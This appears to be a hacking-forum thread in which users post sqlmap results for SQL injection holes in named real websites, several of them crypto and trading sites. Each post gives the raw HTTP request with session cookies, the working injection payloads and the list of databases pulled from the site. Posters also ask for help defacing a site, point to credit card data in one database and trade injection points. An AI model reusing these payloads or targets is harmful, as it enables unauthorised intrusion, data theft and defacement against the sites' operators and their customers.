Interesting SQL injections & XSS found

Please note that this user is banned
admin@gmail.com:admin


POST /login.php HTTP/1.1
Content-Length: 91
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://binanceaut0trade.com/
Cookie: PHPSESSID=98647af8071405e25ef5d36d4079c152
Host: binanceaut0trade.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

login_user=LOGIN&f1=1&f2=1




Parameter: f1 (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: login_user=LOGIN&f1=1' OR NOT 5747=5747-- kUrV&f2=1

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: login_user=LOGIN&f1=1' OR (SELECT 4654 FROM(SELECT COUNT(*),CONCAT(0x7178767071,(SELECT (ELT(4654=4654,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- iAuz&f2=1

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: login_user=LOGIN&f1=1' AND (SELECT 3846 FROM (SELECT(SLEEP(5)))LNIt)-- aeGk&f2=1
---
[20:23:35] [INFO] the back-end DBMS is MySQL
web application technology: LiteSpeed
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:23:38] [INFO] fetching database names
[20:23:39] [INFO] starting 2 threads
[20:23:40] [INFO] retrieved: 'information_schema'
[20:23:40] [INFO] retrieved: 'primewa1_binanceautotrade'
available databases [2]:
[*] information_schema
[*] primewa1_binanceautotrade
 
Please note that this user is banned
https://www.moneycontrol.com/ has its own apps with more than 10 million installs


GET /covid19-quiz-1'%22 HTTP/1.1
Referer: https://www.moneycontrol.com/
Cookie: PHPSESSID=3e2f7e11074338a17e0a4914c07ccbfc; subcat0=all; GC_TRACK_SUB=LAND
Host: www.moneycontrol.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
 

Please note that this user is banned
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: https://www.celojumubode.lv:443/lv/celojumi?turisma=' AND 8175=(SELECT (CASE WHEN (8175=8175) THEN 8175 ELSE (SELECT 4425 UNION SELECT 1146) END))-- -

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: https://www.celojumubode.lv:443/lv/celojumi?turisma=' AND GTID_SUBSET(CONCAT(0x7162717a71,(SELECT (ELT(3353=3353,1))),0x71786a6271),3353)-- Xofe

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries
Payload: https://www.celojumubode.lv:443/lv/celojumi?turisma=';SELECT SLEEP(5)-- YYcF

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: https://www.celojumubode.lv:443/lv/celojumi?turisma=' AND (SELECT 3974 FROM (SELECT(SLEEP(5)))Teyh)-- SeUx

DBA : +

I'd be grateful if someone could help deface it

Please note that this user is banned

POST /Account/signup HTTP/1.1
Content-Length: 807
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=bfjb0ct1a5djaxyiy1stmvx0; __RequestVerificationToken=qQTtVKMWRNkWXt7lzyhnO031K5AQlJtve_a2owAe6lr5bK36GMlyJXBX2iPqBZ25WSH3vSii-tZn8N4qEZTORvLuDKinY3m4L3OoYyhUzJb2B-k4s1MTA7Gg98No588GCs4Vd4jvQpF9n0eekFApKA2; cntrlr=Account
Host: crypto.daani.it
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

LoginButton=REGISTER%20ME&AddressLine1=3137%20Laguna%20Street&chk=1&CityName=lqsrvbwm&ConfirmPassword=g00dPa%24%24w0rD&CountryId=1&DOB=1967/1/1&eMail=sample%40email.tst&FirstName=lqsrvbwm&GenderFemale=F&GenderMale=M&LastName=lqsrvbwm&MainPassword=g00dPa%24%24w0rD&MobileNo=987-65-4329&PinNumber=&PostalCode=94102&SponsorId=1&SponsorName=lqsrvbwm&SSNNo=987-65-4329&StateName=lqsrvbwm&UserName=lqsrvbwm&webUrl=http://www.vulnweb.com&__RequestVerificationToken=X8jv1vS146Oqz8OASxFDTNnioU5zvPvKCcVlim5qr90mobadVJ72zI1Rb_WZx7ULsx2fMX4mr-3gA0u0dAdRD9aWfDYGBXgxudVWbtvNr_gfxvWYY5AbvzR7UYkBNW_IclGywE90f-Oxqz8oIy8gVXVyUhbX09hx1PnU8RQulQg1




Parameter: SponsorId (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: LoginButton=REGISTER ME&AddressLine1=3137 Laguna Street&chk=1&CityName=lqsrvbwm&ConfirmPassword=g00dPa$$w0rD&CountryId=1&DOB=1967/1/1&eMail=sample@email.tst&FirstName=lqsrvbwm&GenderFemale=F&GenderMale=M&LastName=lqsrvbwm&MainPassword=g00dPa$$w0rD&MobileNo=987-65-4329&PinNumber=&PostalCode=94102&SponsorId=-7537' OR 7360=7360-- iiqg&SponsorName=lqsrvbwm&SSNNo=987-65-4329&StateName=lqsrvbwm&UserName=lqsrvbwm&webUrl=http://www.vulnweb.com&__RequestVerificationToken=X8jv1vS146Oqz8OASxFDTNnioU5zvPvKCcVlim5qr90mobadVJ72zI1Rb_WZx7ULsx2fMX4mr-3gA0u0dAdRD9aWfDYGBXgxudVWbtvNr_gfxvWYY5AbvzR7UYkBNW_IclGywE90f-Oxqz8oIy8gVXVyUhbX09hx1PnU8RQulQg1

Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
Payload: LoginButton=REGISTER ME&AddressLine1=3137 Laguna Street&chk=1&CityName=lqsrvbwm&ConfirmPassword=g00dPa$$w0rD&CountryId=1&DOB=1967/1/1&eMail=sample@email.tst&FirstName=lqsrvbwm&GenderFemale=F&GenderMale=M&LastName=lqsrvbwm&MainPassword=g00dPa$$w0rD&MobileNo=987-65-4329&PinNumber=&PostalCode=94102&SponsorId=-9559' OR 5902 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5902=5902) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)))-- BkrH&SponsorName=lqsrvbwm&SSNNo=987-65-4329&StateName=lqsrvbwm&UserName=lqsrvbwm&webUrl=http://www.vulnweb.com&__RequestVerificationToken=X8jv1vS146Oqz8OASxFDTNnioU5zvPvKCcVlim5qr90mobadVJ72zI1Rb_WZx7ULsx2fMX4mr-3gA0u0dAdRD9aWfDYGBXgxudVWbtvNr_gfxvWYY5AbvzR7UYkBNW_IclGywE90f-Oxqz8oIy8gVXVyUhbX09hx1PnU8RQulQg1

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: LoginButton=REGISTER ME&AddressLine1=3137 Laguna Street&chk=1&CityName=lqsrvbwm&ConfirmPassword=g00dPa$$w0rD&CountryId=1&DOB=1967/1/1&eMail=sample@email.tst&FirstName=lqsrvbwm&GenderFemale=F&GenderMale=M&LastName=lqsrvbwm&MainPassword=g00dPa$$w0rD&MobileNo=987-65-4329&PinNumber=&PostalCode=94102&SponsorId=1';WAITFOR DELAY '0:0:5'--&SponsorName=lqsrvbwm&SSNNo=987-65-4329&StateName=lqsrvbwm&UserName=lqsrvbwm&webUrl=http://www.vulnweb.com&__RequestVerificationToken=X8jv1vS146Oqz8OASxFDTNnioU5zvPvKCcVlim5qr90mobadVJ72zI1Rb_WZx7ULsx2fMX4mr-3gA0u0dAdRD9aWfDYGBXgxudVWbtvNr_gfxvWYY5AbvzR7UYkBNW_IclGywE90f-Oxqz8oIy8gVXVyUhbX09hx1PnU8RQulQg1

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: LoginButton=REGISTER ME&AddressLine1=3137 Laguna Street&chk=1&CityName=lqsrvbwm&ConfirmPassword=g00dPa$$w0rD&CountryId=1&DOB=1967/1/1&eMail=sample@email.tst&FirstName=lqsrvbwm&GenderFemale=F&GenderMale=M&LastName=lqsrvbwm&MainPassword=g00dPa$$w0rD&MobileNo=987-65-4329&PinNumber=&PostalCode=94102&SponsorId=1' WAITFOR DELAY '0:0:5'-- GCeM&SponsorName=lqsrvbwm&SSNNo=987-65-4329&StateName=lqsrvbwm&UserName=lqsrvbwm&webUrl=http://www.vulnweb.com&__RequestVerificationToken=X8jv1vS146Oqz8OASxFDTNnioU5zvPvKCcVlim5qr90mobadVJ72zI1Rb_WZx7ULsx2fMX4mr-3gA0u0dAdRD9aWfDYGBXgxudVWbtvNr_gfxvWYY5AbvzR7UYkBNW_IclGywE90f-Oxqz8oIy8gVXVyUhbX09hx1PnU8RQulQg1

Type: UNION query
Title: Generic UNION query (NULL) - 50 columns
Payload: LoginButton=REGISTER ME&AddressLine1=3137 Laguna Street&chk=1&CityName=lqsrvbwm&ConfirmPassword=g00dPa$$w0rD&CountryId=1&DOB=1967/1/1&eMail=sample@email.tst&FirstName=lqsrvbwm&GenderFemale=F&GenderMale=M&LastName=lqsrvbwm&MainPassword=g00dPa$$w0rD&MobileNo=987-65-4329&PinNumber=&PostalCode=94102&SponsorId=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(109)+CHAR(73)+CHAR(114)+CHAR(85)+CHAR(98)+CHAR(82)+CHAR(119)+CHAR(72)+CHAR(84)+CHAR(76)+CHAR(98)+CHAR(114)+CHAR(86)+CHAR(81)+CHAR(102)+CHAR(75)+CHAR(106)+CHAR(117)+CHAR(106)+CHAR(122)+CHAR(89)+CHAR(117)+CHAR(111)+CHAR(67)+CHAR(89)+CHAR(104)+CHAR(77)+CHAR(109)+CHAR(79)+CHAR(67)+CHAR(83)+CHAR(119)+CHAR(102)+CHAR(102)+CHAR(85)+CHAR(104)+CHAR(104)+CHAR(100)+CHAR(108)+CHAR(84)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- OJPY&SponsorName=lqsrvbwm&SSNNo=987-65-4329&StateName=lqsrvbwm&UserName=lqsrvbwm&webUrl=http://www.vulnweb.com&__RequestVerificationToken=X8jv1vS146Oqz8OASxFDTNnioU5zvPvKCcVlim5qr90mobadVJ72zI1Rb_WZx7ULsx2fMX4mr-3gA0u0dAdRD9aWfDYGBXgxudVWbtvNr_gfxvWYY5AbvzR7UYkBNW_IclGywE90f-Oxqz8oIy8gVXVyUhbX09hx1PnU8RQulQg1
---
[13:31:53] [INFO] testing Microsoft SQL Server
[13:31:53] [INFO] confirming Microsoft SQL Server
[13:31:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2016 or 2019
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 10.0
back-end DBMS: Microsoft SQL Server 2019
[13:31:54] [INFO] fetching database names
available databases [16]:
[*] DAANIBudget21
[*] daanidirectselling21
[*] DaaniDoctor
[*] DaaniEComm21
[*] DAANILiveDB
[*] DAANIMLM21
[*] daaniviccion
[*] demoaffiliate20
[*] demodaxx
[*] DemoHelp
[*] demowebsitecms
[*] master
[*] model
[*] msdb
[*] MyOnlineStore21
[*] tempdb


I didn't touch anything, take it; as far as I can tell, there are CCs

Please note that this user is banned
multibux.org

sqlmap identified the following injection point(s) with a total of 905 HTTP(s) requests:
---
Parameter: MULTIPART selected_topics[] ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ctr"

0;100
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="hosts"

-1;99999
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="motive"

2
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="price"

0;10000
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="selected_topics[]"

1) AND 8750=(SELECT (CASE WHEN (8750=8750) THEN 8750 ELSE (SELECT 3262 UNION SELECT 8088) END))-- -
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="size"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="token_hash"

ad4c41c4cc598c5ba13a839c84bfbbea
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="type"

search
------------YWJkMTQzNDcw--

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ctr"

0;100
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="hosts"

-1;99999
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="motive"

2
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="price"

0;10000
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="selected_topics[]"

1) AND GTID_SUBSET(CONCAT(0x717a6b6271,(SELECT (ELT(5566=5566,1))),0x7162766a71),5566)-- WQAv
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="size"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="token_hash"

ad4c41c4cc598c5ba13a839c84bfbbea
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="type"

search
------------YWJkMTQzNDcw--

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ctr"

0;100
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="hosts"

-1;99999
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="motive"

2
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="price"

0;10000
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="selected_topics[]"

1) AND (SELECT 7426 FROM (SELECT(SLEEP(5)))izbe)-- UMzV
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="size"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="token_hash"

ad4c41c4cc598c5ba13a839c84bfbbea
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="type"

search
------------YWJkMTQzNDcw--
---
[22:54:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[22:54:35] [INFO] fetching database names
[22:54:36] [INFO] starting 2 threads
[22:54:36] [INFO] retrieved: 'admin_multibase123'
[22:54:37] [INFO] retrieved: 'information_schema'
available databases [2]:
[*] admin_multibase123
[*] information_schema
 
Please note that this user is banned

---
Parameter: job_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: job_id=129 AND 1248=1248
---

[10:13:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[10:13:45] [INFO] fetching database names
[10:13:45] [INFO] fetching number of databases
[10:13:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:13:45] [INFO] retrieved: 2
[10:13:54] [INFO] retrieved: information_schema
[10:16:23] [INFO] retrieved: agradgdu_cloudexperts
available databases [2]:
[*] agradgdu_cloudexperts
[*] information_schema
 
Please note that this user is banned

Parameter: service (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: servico=316' AND 8009=8009 AND 'evLT'='evLT

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: servico=316' AND (SELECT 6165 FROM(SELECT COUNT(*),CONCAT(0x717a6b7871,(SELECT (ELT(6165=6165,1))),0x7170767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QVNE'='QVNE

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: servico=316';SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: servico=316' AND (SELECT 8138 FROM (SELECT(SLEEP(5)))ocPd) AND 'ywau'='ywau

Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: servico=-4925' UNION ALL SELECT CONCAT(0x717a6b7871,0x776e616d514477746b466b6e4d6f4b6a78544848536857576e414a6954704b565369704b484c505a,0x717076
---
[15:38:12] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:38:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[15:38:19] [INFO] fetching database names
[15:38:36] [INFO] retrieved: 'information_schema'
[15:38:45] [INFO] retrieved: 'nexuscod_negocios'

available databases [2]:
[*] information_schema
[*] nexuscod_negocios
 
Please note that this user is banned
Friends, could you share some injections via PM? I'm just starting to study the material and would like some practice

Please note that this user is banned
sunteccoin.io

POST /forget-pass HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://sunteccoin.io/
Cookie: __pixel__sun=gahj9h2br8p7bidov9ldrtdgj9f1ac66
Content-Length: 68
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: sunteccoin.io
Connection: Keep-alive

u_email=1

Parameter: u_email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: u_email=1') OR NOT 4593=4593-- SVUU

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: u_email=1') AND (SELECT 9098 FROM (SELECT(SLEEP(5)))RyET)-- tdhm
---

[22:15:21] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [2]:
[*] information_schema
[*] sunteccoin_token
 
Please note that this user is banned
crypto5color.com


POST /fetch.php?sponsorid=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://165.232.190.253/
Cookie: PHPSESSID=rv39094p9uhmtc682a1id5gvrl; drift_campaign_refresh=134a0a7e-a3ac-4106-81b3-48d32202c2bd
Content-Length: 0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: 165.232.190.253
Connection: Keep-alive


Parameter: sponsorid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: sponsorid=-2796' OR 8338=8338-- WhNY

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (query SLEEP)
Payload: sponsorid=1';(SELECT * FROM (SELECT(SLEEP(5)))EEYP)-- ydmo

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sponsorid=1' AND (SELECT 1929 FROM (SELECT(SLEEP(5)))XhUb)-- JmIP

Type: UNION query
Title: Generic UNION query (random number) - 67 columns
Payload: sponsorid=1' UNION ALL SELECT 2921,2921,CONCAT(0x716b627871,0x4b7864594459657451454f494c41684d7169584d4f4e4f50494f45446d6a544a4f4444545446476d,0x7178626a71),2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921-- -
---
[02:53:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[02:54:01] [INFO] fetching database names
available databases [9]:
[*] crypto
[*] information_schema
[*] mrs
[*] mysql
[*] performance_schema
[*] rfmpl
[*] sys
[*] unique
[*] ww
 
Please note that this user is banned
www.winningstracker.com

GET /about/1* HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.winningstracker.com/
Cookie: PHPSESSID=cm90tdh4uc72a0n4686o6icql5; sc_is_visitor_unique=rx12470881.1648043546.985F1C5EFA3E4FFE6B5AC0DCF67EA1EE.1.1.1.1.1.1.1.1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: www.winningstracker.com
Connection: Keep-alive

Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://www.winningstracker.com:80/about/-5351' OR 7726=7726-- QxfM

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: http://www.winningstracker.com:80/about/1' OR SLEEP(5)-- xIHd

Type: UNION query
Title: Generic UNION query (random number) - 6 columns
Payload: http://www.winningstracker.com:80/about/1' UNION ALL SELECT 3752,3752,3752,3752,CONCAT(0x716a767671,0x417177687167556b4865475a6a73714653564672475a664f476947615672774147564e495761484c,0x717a7a7671),3752-- -

available databases [1]:
[*] winnings_tracker
 
Please note that this user is banned

```
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=269276 AND 3703=3703

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: id=269276 AND 6115 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6115=6115) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(122)+CHAR(113)))

Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(106)+CHAR(113)+CHAR(98)+CHAR(113)+(CASE WHEN (2007=2007) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(122)+CHAR(113))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=269276;WAITFOR DELAY '0:0:5'--



available databases [57]:
[*] Archiv
[*] Child
[*] Classifieds
[*] Conkurs
[*] DACHA
[*] Dance
[*] Distribution
[*] Dossier
[*] Ege
[*] Euro2008
[*] Football
[*] GLOBAL
[*] gonor
[*] Happy
[*] Intershop
[*] KAZ
[*] Kino2006
[*] Kino2007
[*] Kino2008
[*] Klass
[*] master
```
 
Please note that this user is banned
Apparel Shopping Site


---
Parameter: ttype (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: ttype=0 OR NOT 7943=7943

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: ttype=0 OR SLEEP(5)

Web application technology: PHP 5.2.17, Apache 2.4.23
Back-end DBMS: MySQL >= 5.0.12

available databases [1]:
[*] nyfifth_hr2
 

